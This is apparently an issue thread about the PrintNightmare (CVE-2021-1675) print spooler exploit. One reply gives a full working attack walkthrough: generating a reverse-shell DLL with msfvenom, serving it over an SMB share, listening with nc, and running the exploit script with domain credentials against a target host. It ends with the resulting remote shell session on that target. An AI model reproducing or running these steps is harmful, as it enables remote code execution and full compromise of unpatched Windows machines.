Dll not executing

[useragent23253]

I was testing with custom dll that create local admin user and with msfvenom shellcode. Both samples aren't working. Any suggestion?

c:\Users\user1\Downloads>SharpPrintNightmare.exe 'c:\programdata\5001.dll'
[] pDriverPath C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\mxdwdrv.dll
[] Executing 'c:\programdata\5001.dll'
[] Try 1...
[] Stage 0: 87
[] Try 2...
[] Stage 0: 87
[] Try 3...
[] Stage 0: 87

[CustosClarus]

it will solve for you if you use the domain user account not the admin

[MiMaz7707]

Hello,

The exploit will not work if you use a privileged user, the user must be a simple domain user.

Steps from a kali machine :

1- remove preinstalled  impacket package

# arp remove --purge python3-impkacket
or 
# pip3 uninstall impacket

2- install the impacket package from cube0x0 repo

# git clone https://github.com/cube0x0/impacket
# cd impacket
# python3 ./setup.py install

3- create a dll payload
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.117.200 LPORT=9090 -f dll -o print64.dll

4- put the payload on shared folder and run smbserver.py or smbd service

# cp print64.dll /share/

# smbserver.py share /share -smb2support

/usr/local/bin/smbserver.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'smbserver.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

5- run nc for listening
# nc -lvp 9090
listening on [any] 9090 ...

6- run the exploit with a simple domain user, will generate some errors but it will work

# python3 CVE-2021-1675.py mylab.local/user:'user@koko123'@192.168.117.10 '\\192.168.117.200\share\print64.dll' 

[*] Connecting to ncacn_np:192.168.117.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3d8f0626c408afea\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.80.41\share\print64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
7- here is my shell :D 
nc -lvp 9090
listening on [any] 9090 ...
connect to [192.168.117.200] from SRV-EX01.mylab.local [192.168.117.10] 52823
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
hostname
SRV01

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::4980:feb4:6fae:992d%6
   IPv4 Address. . . . . . . . . . . : 192.168.117.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.117.254

Tunnel adapter isatap.{EC174390-CEE5-4891-85B5-536D188BC65E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

[MiMaz7707]

it works fine with impacket 0.11.0 too